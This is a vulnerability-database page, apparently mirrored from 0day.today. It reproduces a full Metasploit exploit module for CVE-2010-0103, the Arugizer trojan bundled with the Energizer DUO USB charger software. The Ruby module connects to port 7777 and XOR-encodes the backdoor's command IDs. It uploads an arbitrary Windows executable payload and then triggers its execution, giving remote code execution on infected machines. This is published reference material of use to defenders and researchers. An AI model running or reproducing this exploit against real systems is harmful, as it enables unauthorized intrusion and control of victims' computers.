Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Energizer DUO USB Battery Charger Unauthorized Access Vulnerability

🗓️ 18 Mar 2010 00:00:00Reported by Ed SchallerType 
zdt
 zdt🔗 0day.today👁 27 Views

Energizer DUO USB Battery Charger Unauthorized Access Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		Trojan/Backdoor - Arugizer Detection
9 Mar 201000:00
nessus
Tenable Nessus		Arugizer Backdoor Detection
8 Mar 201000:00
nessus
Tenable Nessus		Energizer DUO USB Battery Charger Software Backdoor (credentialed check)
8 Mar 201000:00
nessus
Circl		CVE-2010-0103
20 Sep 201000:00
circl
Check Point Advisories		Energizer DUO Trojan Code Execution (CVE-2010-0103)
31 Mar 201300:00
checkpoint_advisories
CVE		CVE-2010-0103
9 Mar 201019:00
cve
Cvelist		CVE-2010-0103
9 Mar 201019:00
cvelist
Exploit DB		Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)
20 Sep 201000:00
exploitdb
Metasploit		Energizer DUO Trojan Scanner
8 Mar 201019:06
metasploit
Metasploit		Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution
8 Mar 201019:06
metasploit
Rows per page
===================================================================
Energizer DUO USB Battery Charger Unauthorized Access Vulnerability
===================================================================

Credit:  	 Ed Schaller
Vulnerable: 	Energizer DUO 0


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Energizer DUO Trojan Code Execution',
			'Description'    => %q{
				This module will execute an arbitrary payload against
			any system infected with the Arugizer trojan horse. This
			backdoor was shipped with the software package accompanying
			the Energizer Duo USB battery charger.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8749 $',
			'References'     =>
				[
					['CVE', '2010-0103'],
					['URL', 'http://www.kb.cert.org/vuls/id/154421']
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0
			))


		register_options(
			[
				Opt::RPORT(7777),
			], self.class)
	end

	def trojan_encode(str)
		str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
	end

	def trojan_command(cmd)
		cid = ""

		case cmd
		when :exec
			cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
		when :dir
			cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
		when :write
			cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
		when :read
			cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
		when :nop
			cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
		when :find
			cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
		when :yes
			cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
		when :runonce
			cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
		when :delete
			cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
		end

		trojan_encode(
			[cid.length + 1].pack("V") + cid  + "\x00"
		)
	end

	def exploit

		nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
		exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"


		print_status("Trying to upload #{nam}...")
		connect

		# Write file request
		sock.put(trojan_command(:write))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))
		sock.put(trojan_encode([exe.length].pack("V")))
		sock.put(trojan_encode(exe))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect

		#
		# Execute the payload
		#

		print_status("Trying to execute #{nam}...")

		connect

		# Execute file request
		sock.put(trojan_command(:exec))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect
	end
end




#  0day.today [2018-03-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.76775
energizerunauthorized accessvulnerabilityarugizer trojancode executionusb chargerremote exploitwindows.
27